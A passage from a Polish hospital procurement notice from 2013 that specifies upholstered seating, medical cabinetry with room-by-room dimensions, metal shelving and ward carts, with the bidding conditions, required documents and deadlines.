2.	Oferowany asortyment musi być odporny na środki myjąco-dezynfekujące przeznaczone do mebli medycznych (dotyczy mebli tapicerowanych i stolików)
3.	Okres pełnej gwarancji na 36 miesięcy. 
4.	Przed przystąpieniem do realizacji zamówienia należy dokonać inwentaryzacji pomieszczeń w celu ewentualnej korekty parametrów oraz szczegółowego określenia kolorystyki.
5.	Jakiekolwiek odstępstwa od podanych wymagań spowodują automatyczne odrzucenie oferty.
6.	Na widocznych elementach mebli pojedynczych należy nakleić silikonowe naklejki z danymi producenta oraz trwałe odporne na wilgoć i środki dezynfekcyjne naklejki o wymiarach ok. 9,5 cm (szerokość) x 3,5 cm (wysokość). Wzór naklejki zostanie przekazany Wykonawcy najpóźniej w dniu zawarcia umowy.
I.	Przykładowe meble
Krzesło tapicerowane - wzór nr 1
 Tapicerka łatwo zmywalna
Stolik śniadaniowy drewniany o wym. 70x70cm - wzór nr 2
Sofa - wzór nr 3
  Sofa o prostej lekkiej formie z podłokietnikami, metalowe nogi, tapicerka łatwo zmywalna, szer. 140cm
Stolik kawowy - wzór nr 4
 Blat z płyty, nogi metalowe
II. Wykaz mebli tapicerowanych i stolików
L.p.	Asortyment 	Pomieszczenie 	Ilość w szt.
1	Krzesło obrotowe biurowe	- sekretariat
- gabinet ordynatora
- gabinet diagnostyczno-zabiegowy
- gabinet zabiegowy
- pokój pielęgniarki oddziałowej
- gabinet lekarski
- punkt pielęgniarski (odc. męski)
- punkt pielęgniarski (odc. kobiecy)
- sala intensywnego nadzoru	3
1
1
1
1
1
1
1
1
2	Krzesło tapicerowane  zmywalne (fotel), konstrukcja drewniana - 
wg wzoru nr 1	- gabinet ordynatora
- pokój pielęgniarki oddziałowej
- pokój socjalny (odc. Kobiecy)
- pokój socjalny (odc. Męski)
- sekretariat	4
2
2
2
2
3	Krzesło zmywalne PCV o konstrukcji metalowej	- gabinet diagnostyczno-zabiegowy
- gabinet zabiegowy
- punkt pielęgniarski (odc. Męski)
- punkt pielęgniarski (odc. Kobiecy)
- kuchnia
- sala intensywnego nadzoru	2
2
2
2
3
2
4	Taboret szpitalny siedzisko PCV, konstrukcja metalowa	- Sale chorych (w tym sala intensywnego nadzoru),
- Pro morte	58
2
5	Wersalka - tapicerka zmywalna 	- pokój lekarski
- pokój socjalny (odc. Kobiecy)
- pokój socjalny (odc. Męski)	1
1
1
6	Sofa - tapicerka zmywalna - wg wzoru nr 3	- hol	2
7	Stolik śniadaniowy - wg wzoru nr 2	- gabinet ordynatora
- pokój pielęgniarki oddziałowej
- pokój socjalny (odc. Kobiecy)
- pokój socjalny (odc. Męski)	1
1
1
1
8	Stolik kawowy - wg wzoru nr 4	- hol	2
9	Siedziska PCV konstrukcja metalowa - 1 zestaw z pięcioma siedziskami 	- korytarz	4 zestawy
UWAGA:
RYSUNKI DOTYCZĄCE ROZMIESZCZENIA POSZCZEGÓLNYCH MEBLI ZNAJDUJĄ SIĘ W ZAŁĄCZNIKACH DO SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5, 33.19.30.00-2, 39.14.10.00-2, 39.11.11.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo - w oryginale lub w postaci kopii poświadczonej notarialnie,
2) Wypełniony formularz oferty.
3) Wypełnioną specyfikację techniczną/formularz cenowy zgodnie z oferowaną częścią</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia ul. Lekarska 4 pok. 308 lub 309.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2013 godzina 11:00, miejsce: Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia ul. Lekarska 4 pok. 308 lub 309.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> meble medyczne atestowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 meble medyczne atestowane
I. Opis mebli medycznych:
1.	Korpusy oraz półki mebli wykonane z płyty wiórowej obustronnie laminowanej o gr 18 mm. Widoczne krawędzie oklejone obrzeżem ABS lub PCV o gr 0,5 - 1 mm w kolorze laminatu płyty
2.	Wszystkie półki o regulowanej wysokości
3.	Widoczne zewnętrzne części korpusu szafek nie mogą mieć widocznych elementów łączeniowych (zachowanie jednolitej nienaruszonej płaszczyzny laminatu)
4.	Tylne ścianki wykonane z płyty pilśniowej HDF o gr min. 3 mm jednostronnie laminowane w kolorze białym
5.	Widoczne tylne ścianki szafek z płyty korpusowej bez widocznych elementów łączeniowych
6.	Szafki dolne i szafy podwieszane, wyposażone w systemy zawieszek regulowanych w dwóch płaszczyznach o wytrzymałości min. 200 kg na szafkę, uniemożliwiający przypadkowe ich zdjęcie
7.	Niektóre szafki dolne i szafy na cokole z uszczelką silikonową przy posadzce lub nóżkach (zgodnie z rysunkami)
8.	Szafki górne wyposażone w systemy zawieszek regulowanych w dwóch płaszczyznach
9.	Zawiasy puszkowe wyposażone w zintegrowane elementy amortyzujące gwarantujące ciche domykanie 
10.	Szafki górne klapowe wyposażone w podnośniki gazowe 
11.	Prowadnice szuflad łożyskowane ze zintegrowanymi bokami metalowymi zapewniające pełny wysuw oraz dociąg i ciche domykanie (typu tandembox firmy BLUM lub podobny), wytrzymałość  dynamiczna min 30 kg
12.	Fronty płaskie wykonane z płyty MDF gr. 19 mm, zaokrąglone na zewnętrznych krawędziach, o promieniu R=3mm, pokryte jednolitą folią PCV  na wszystkich widocznych krawędziach  o gr. 0,3-0,4 mm, wewnętrzna strona frontu pokryta laminatem przeciwprężnym w kolorze białym.  
13.	Uchwyty metalowe galwanizowane w kolorze chromu, satynowe o rozstawie ok. 120 mm. Uchwyt o prostym kształcie (bez ostrych załamań i krawędzi) umożliwiający łatwe czyszczenie
14.	Uchwyty w pomieszczeniach zabiegowych j.w. lecz ze stali nierdzewnej
15.	Blaty szafek i blaty robocze gr. 38mm pokryte laminatem o gr. min. 0,6 mm, od czoła wykończony w kształcie litery U z zabezpieczeniem przeciwwodnym, widoczne pozostałe krawędzie blatu wykończone z tworzywa sztucznego (ABS lub PCV)
16.	Blaty biurek gr. 38 mm pokryte laminatem o gr. min. 0,6 mm, widoczne krawędzie blatu wykończone z tworzywa sztucznego (ABS lub PCV)
17.	W blatach i korpusach przelotki na przewody - 20szt.
18.	Nóżki do szafek metalowe chromowane o średnicy 50 mm, wys. 10cm z możliwością regulacji wysokości
19.	Kółka do szafek mobilnych przystosowane do miękkiego podłoża
20.	W blatach nad grzejnikami należy wmontować kratki PCV przepuszczające ciepło o wym. 80x10 - 10szt.
21.	Podstawa pod komputer - PCV, na kółkach, o regulowanej szerokości - 20szt.
22.	Półki PCV pod klawiaturę, mocowana pod blatem - 20szt.
Uwaga: 
23.	W opisie asortymentu wszystkie podane głębokości są liczone bez frontów, a wszystkie wysokości podane są z grubością blatu
24.	Wszystkie wymiary należy skorygować podczas wizji lokalnej przed przystąpieniem do realizacji zamówienia
25.	Kolorystyka mebli do uzgodnienia po wyborze oferenta przed przystąpieniem do realizacji zamówienia.
26.	Odporność na środki myjąco-dezynfekujące przeznaczone do mebli medycznych.
27.	Okres pełnej gwarancji 36 miesięcy.  
28.	Na widocznych elementach mebli pojedynczych należy nakleić silikonowe naklejki z danymi producenta oraz trwałe odporne na wilgoć i środki dezynfekcyjne naklejki o wymiarach ok. 9,5 cm (szerokość) x 3,5 cm (wysokość). Wzór naklejki zostanie przekazany Wykonawcy najpóźniej w dniu zawarcia umowy.
II. Wykaz mebli
PUNKT PIELĘGNIARSKI STRONA KOBIECA
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafka górna wisząca	600	400	300	3
2	Szafka górna wisząca	800	750	300	1
3	Szafka górna wisząca	330	750	300	2
4	Zestaw szafek dolnych stojących 	1460	850
	500
	1
5	Biurko z nadstawką z kontenerem na nóżkach aluminiowych
+ blat roboczy
z kontenerem na nóżkach aluminiowych
(wym. kontenerów 400x770x550)	1200
2360	800
800	600
400	1
6	Witryna podwieszana częściowo przeszklona	500	1800	300	1
POM. 1.37 - POKÓJ PRZYGOTOWAWCZY
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa podwieszana	1800	1800	600	1
2	Szafka górna wisząca	600	400	300	3
3	Półka wisząca	270	400	300	1
4	Zestaw szafek dolnych podwieszanych /4x400x650x550-drzwiczki/
przykrytych jednym blatem (w blacie otwór na zlewozmywak)	2370	850	600
	1
POM. 1.33 - GABINET DIAGNOSTYCZNO-ZABIEGOWY
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafka górna wisząca	600	400	300	4
2	Zestaw szafek dolnych podwieszanych (2x800x650x550-szuflady, 1x800x650x550 drzwiczki, 1x400x650x550-drzwiczki, 1x400x820x550-kontener na nóżkach aluminiowych)
przykrytych jednym blatem narożnym 	3700x1540	850	600	1
3	Szafka zlewozmywakowa podwieszana 	800	650	550	1
POM. 1.32 -  SEKRETARIAT
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa ubraniowa podwieszana	1000	1800	600	1
2	Witryna podwieszana z częściowo otwartymi półkami	1500	1800	600	1
3	Szafka wisząca	700	400	300	1
4	Biurko narożne z dwoma kontenerami stałymi i jednym kontenerem mobilnym /wym. kontenerów 400x720x550/	2800x2100	750	600	1
POM. 1.31 -  POKÓJ ORDYNATORA
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa ubraniowa na cokole	600	2000	600	1
2	Witryna na cokole z częściowo otwartymi półkami	1600	2000	300	1
3	Szafka wisząca	700	400	300	1
4	Biurko narożne z jednym kontenerem stałym na nóżkach aluminiowych /wym. kontenera 400x720x550/	2000x1600	750	600	1
POM. 1.59 -  MAGAZYN BIELIZNY CZYSTEJ
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Regał z półkami na cokole	2880x2290x1900	3200	600	1
POM. 1.60 -  POKÓJ PIELĘGNIARKI ODDZIAŁOWEJ
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Witryna podwieszana z częścią ubraniową	1000	1800	600	1
2	Witryna podwieszana częściowo przeszklona	880	1800	600	1
3	Witryna podwieszana	1000	1800	300	1
4	Biurko narożne z dwoma kontenerami stałymi na nóżkach aluminiowych /wym. kontenerów 400x720x550/	2100x1600	750	600	1
5	Półka wisząca	1270	350	300	1
6	Półka wisząca	1800	350	300	1
POM. 1.27 -  GABINET ZABIEGOWY
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Witryna podwieszana częściowo przeszklona	800	1600	600	1
2	Witryna podwieszana częściowo przeszklona	1000	1600	600	1
3	Szafa podwieszana	1000	1600	400	1
4	Szafka wisząca górna	600	400	300	3
5	Półka wisząca	700	400	200	1
6	Zestaw szafek podwieszanych dolnych (3x400x550x550-drzwiczki), przykryte jednym blatem narożnym	2500x1150	800	600	1
7	Szafka górna wisząca	700	400	300	2
8	Zestaw szafek podwieszanych dolnych (1x600x550x550-drzwiczki, 1x800x550x550-drzwiczki), przykryte jednym blatem z otworem na zlewozmywak	1400	800	600	1
POM. KORYTARZ
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Zabudowa wnękowa	2260	3200	640	1
POM. 1.14 -  POKÓJ LEKARSKI - POBYT DZIENNY
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Witryna na cokole z częściowo otwartymi półkami	1460	2000	320	1
2	Półka wisząca	3000	540	320	1
3	Biurko z dwoma kontenerami stałymi na nóżkach aluminiowych /wym. kontenerów 400x720x550/	3000	750	600	1
4	Szafa ubraniowa na cokole (3x400)	1200	2000	600	1
5	Szafa ubraniowa na cokole
(1x400)	400	2000	600	1
6	Biurko z dwoma kontenerami stałymi na nóżkach aluminiowych /wym. kontenerów 400x720x550/	3480	750	600	1
POM. 1.12 -  POKÓJ LEKARSKI
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Półka wisząca	1220	540	320	1
2	Biurko narożne z kontenerem mobilnym /wym. kontenera 400x720x550/	1420x2420	750	600	1
3	Szafa ubraniowa na cokole (8x400)	3200	2000	600	1
4	Szafka wisząca górna	875	400	300	4
5	Zestaw szafek podwieszanych dolnych (2x550x650x550), przykrytych jednym blatem	1750	750	600	1
POM. 1.24 -  KUCHNIA ODDZIAŁOWA
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Witryna na cokole częściowo przeszklona	950	2100	600	1
2	Szafka wisząca górna	600	750	300	1
3	Szafka narożna wisząca górna 	800	750	800	1
4	Szafka wisząca górna	800	750	300	3
5	Zestaw szafek stojących (2x200x820x550-kargo, 1x400x820x550-drzwiczki, 1x800x800x820-szafka narożna, 1x800x820x550, 1x800x820x550-szuflady) przykryte jednym blatem	1400x3720x1030	850	600	1
6	Zestaw szafek stojących (1x500x820x550-drzwiczki, 1x800x700x820-szafka narożna, 1x800x820x550-szuflady) przykryte jednym blatem	1320x1610	850	600	1
POM. 1.22 - POKÓJ SOCJALNY STRONA MĘSKA
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa podwieszana	1200	1800	600	1
2	Szafka górna wisząca	600	400	300	3
3	Półka wisząca	520	400	300	1
4	Zestaw szafek dolnych podwieszanych /4x400x650x550-drzwiczki/
przykrytych jednym blatem (w blacie otwór na zlewozmywak) 	2320	850	600
	1
DYŻURKA PIELĘGNIAREK STRONA MĘSKA
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafka górna wisząca	600	400	300	4
2	Biurko z nadstawką z kontenerem na nóżkach aluminiowych (wym. kontenerów 400x770x550)
+ blat roboczy z zestawem szafek podwieszanych (4x400x620x550)	2840x2100	800	600	1
3	Witryna podwieszana częściowo przeszklona	500	1800	300	1
POM. 1.18 - MAGAZYN PUNKTU PIELĘGNIARSKIEGO
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Zabudowa wnękowa	750	600	2530	1
POM. 1.06 - SALA NADZORU INTERNISTYCZNEGO
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa podwieszana	1080	1800	600	2
2	Szafka górna wisząca	500	400	300	2
3	Witryna podwieszana częściowo przeszklona	1000	1800	600	1
4	Blat na wspornikach	1000	850	600	1
5	Zestaw szafek wiszących	1570	750	300	1
6	Zestaw szafek podwieszanych dolnych	1570	650	850	1
7	Konsola półokrągła	2750	700	1375	1
POM. 1.16 - SALA NADZORU INTERNISTYCZNEGO
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa podwieszana	1000	1800	300	1
POM. 1.40 - MAGAZYN BIELIZNY BRUDNEJ
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Szafa podwieszana	800	1800	300	1
Część 2 meble metalowe
1.	Przedmiot zamówienia stanowią meble metalowe (regały) oraz wózki oddziałowe
2.	Asortyment objęty niniejszym zamówieniem, stanowić będzie wyposażenie pomieszczeń szpitala z przeznaczeniem do przechowywania urządzeń narzędzi i przyrządów przed i po sterylizacji, środków czystości, BHP.
3.	Oferowany asortyment musi być odporny na środki myjąco-dezynfekujące przeznaczone do mebli medycznych.
4.	Przed przystąpieniem do realizacji zamówienia należy dokonać inwentaryzacji pomieszczeń w celu ewentualnej korekty parametrów.
5.	Okres pełnej gwarancji na 36 miesięcy.  
6.	Jakiekolwiek odstępstwa od podanych wymagań spowodują automatyczne odrzucenie oferty.
7.	Na widocznych elementach mebli pojedynczych należy nakleić silikonowe naklejki z danymi producenta oraz trwałe odporne na wilgoć i środki dezynfekcyjne naklejki o wymiarach ok. 9,5 cm (szerokość) x 3,5 cm (wysokość). Wzór naklejki zostanie przekazany Wykonawcy najpóźniej w dniu zawarcia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5, 33.19.30.00-2, 39.14.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> meble metalowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 meble metalowe
1.	Przedmiot zamówienia stanowią meble metalowe (regały) oraz wózki oddziałowe
2.	Asortyment objęty niniejszym zamówieniem, stanowić będzie wyposażenie pomieszczeń szpitala z przeznaczeniem do przechowywania urządzeń narzędzi i przyrządów przed i po sterylizacji, środków czystości, BHP.
3.	Oferowany asortyment musi być odporny na środki myjąco-dezynfekujące przeznaczone do mebli medycznych.
4.	Przed przystąpieniem do realizacji zamówienia należy dokonać inwentaryzacji pomieszczeń w celu ewentualnej korekty parametrów.
5.	Okres pełnej gwarancji na 36 miesięcy.  
6.	Jakiekolwiek odstępstwa od podanych wymagań spowodują automatyczne odrzucenie oferty.
7.	Na widocznych elementach mebli pojedynczych należy nakleić silikonowe naklejki z danymi producenta oraz trwałe odporne na wilgoć i środki dezynfekcyjne naklejki o wymiarach ok. 9,5 cm (szerokość) x 3,5 cm (wysokość). Wzór naklejki zostanie przekazany Wykonawcy najpóźniej w dniu zawarcia umowy.
I.	Wykaz mebli metalowych (regałów)
POM. 1.40 - POMIESZCZENIA GOSPODARCZE /POM.PORZĄDKOWE/
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Regał z półkami	2000	2000	350	1
POM. 1.40 - POMIESZCZENIA GOSPODARCZE /BRUDOWNIK/
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Regał z półkami	1200	2000	300	1
2	Regał z półkami	1000	2000	300	1
POM. 1.26 - MAGAZYN SPRZĘTU
L.P.	RODZAJ WYPOSAŻENIA	GABARYTY
     Szer.                 Wys.              Gł.	ILOŚĆ W SZT.
1	Regał narożny z półkami	2000x1600	2000	600	1
II.	Wykaz wózków oddziałowych
Lp.	Parametry wymagane
1.	WÓZEK DO PRZEWOŻENIA POTRAW I - szt. 1
1.1	Wózek wykonany z kształtowników stalowych pokrytych lakierem proszkowym.
1.2.	Wyposażenie wózka :
a). 2 blaty wykonane w formie wyjmowanych tac ze stali kwasoodpornej, ułożonych w dwóch poziomach
b). uchwyt do prowadzenia wózka
c). dodatkowa , uchylna półka umocowana przy górnym blacie
d). cztery kółka o średnicy min.100 mm, w tym 2 z blokadą
1.3.	Wymiary wózka:
a). długość - 1.000 mm (? 100 mm)
b). szerokość - 650 mm (? 50 mm)
c). wysokość - 1.000 mm (? 100 mm)
1.4.	Gwarancja min. 24 miesiące.
2.	WÓZEK DO PRZEWOŻENIA POTRAW II - szt. 1
2.1.	Wózek wykonany z kształtowników stalowych pokrytych lakierem proszkowym.
2.2.	Wyposażenie wózka :
a). 2 blaty wykonane w formie wyjmowanych tac ze stali kwasoodpornej , ułożonych w dwóch poziomach
b). uchwyt do prowadzenia wózka
c). cztery kółka o średnicy min.100 mm, w tym 2 z blokadą
2.3.	Wymiary wózka:
a). długość - 1.000 mm (? 100 mm)
b). szerokość - 650 mm (? 50 mm)
c). wysokość - 1.000 mm (? 100 mm)
2.4.	Gwarancja min.24 miesiące.
3.	WÓZEK NA ODPADY POTRÓJNY - szt. 2
3.1.	Wózek przeznaczony do składowania i przewozu odpadów i brudnej bielizny w workach foliowych
3.2.	Wózek potrójny przystosowany do worków foliowych o pojemności 100 - 120 litrów
3.3.	Pokrywy wózka podnoszone pedałem nożnym, każda osobno.
3.4.	Zabezpieczenie przed zsunięciem się worka z obręczy w postaci klipsów zaciskowych
3.5.	Stelaż wózka wykonany ze stali pokrytej powłoką niklowo-chromowa,trwałą i odporną na korozję
3.6.	Pokrywy i podstawa wózka wykonane z tworzywa ABS o podwyższonych własnościach mechanicznych i odporności na promieniowanie UV
3.7.	Wózek wyposażony w 4 koła o średnicy min.50 mm, w tym 2 z blokadą.
3.8.	Wózek łatwy w utrzymaniu w czystości, odporny na środki dezynfekcyjne
3.9.	Wymiary skrajne wózka :
a). długość - 1.210 mm (? 20 mm)
b). szerokość - 400 mm (? 20 mm)
c). wysokość - 860 mm (? 30 mm)
3.10.	Gwarancja min.24 miesiące.
4.	STATYW DO POMPY INFUZYJNEJ - szt. 20
4.1.	Statyw do mocowania od 1 do 4 pomp
4.2.	Stabilna podstawa o średnicy 780-800 mm
4.3.	Podstawa wyposażona w 5 kółek (w tym 2 z blokadą)
4.4.	Kolumna statywu wykonana ze stali chromowanej o wysokości 1900-1950 mm, w górnej części wyposażona w wieszak do kroplówek
4.5.	4-krotne gniazdo sieciowe zainstalowane na podstawie statywu
4.6.	Gniazdo wyposażone w sygnalizację zasilania, przewód przyłączeniowy o długości min. 4 m, bolce uziemiające, sygnalizację napięcia na poszczególnych gniazdach, dwa wymienne bezpieczniki, atestowana obudowa.
4.7.	Waga statywu max. 6 kg
4.8.	Gwarancja 24 m-ce
5.	STOLIK (WÓZEK) ODDZIAŁOWY - NA LEKI - szt. 2
5.1.	Stolik wykonany z kształtowników stalowych pokrytych lakierem proszkowym
5.2.	Skład wyposażenia:
a). cztery tace ze stali kwasoodpornej umieszczone na dwóch poziomach
b). tace wypełnione przegródkami na leki ,tace wykonane z tworzywa
c). uchwyt do prowadzenia wózka
d). cztery koła samonastawne , w tym dwa z blokadą
e). dwie uchylne miski na odpady
5.3.	Wymiary wózka :
a). długość: 660 mm (? 50 mm)
b). szerokość: 420 mm (? 50 mm)
c). wysokość: 870 mm (? 50 mm)
5.4.	Gwarancja min.24 miesiące.
6.	STOLIK (WÓZEK) ODDZIAŁOWY - WIELOFUNKCYJNY - szt. 2
6.1.	Stolik wykonany z kształtowników stalowych pokrytych lakierem proszkowym
6.2.	Skład wyposażenia :
a). blat (taca) ze stali 
b). dwie półki poniżej blatu, w dwóch poziomach, w postaci koszy drucianych
c). uchwyt worka na odpady
d). uchwyt do prowadzenia wózka
e). cztery koła samonastawne , w tym dwa z blokadą
6.3.	Wymiary wózka:
a). długość: 810 mm (? 50 mm)
b). szerokość: 430 mm (? 50 mm)
c). wysokość: 890 mm (? 50 mm)
6.4.	Gwarancja min.24 miesiące.
7.	WÓZEK FUNKCYJNY RATUNKOWY - szt. 1
7.1.	Szkielet wózka, blat górny i szuflady wykonane z materiału charakteryzującego się wysoką wytrzymałością i twardością, stal nierdzewna lub tworzywo BAYDUR
7.2.	Konstrukcja wózka wyposażona w centralny system zamknięcia wszystkich szuflad - zamykany na klucz
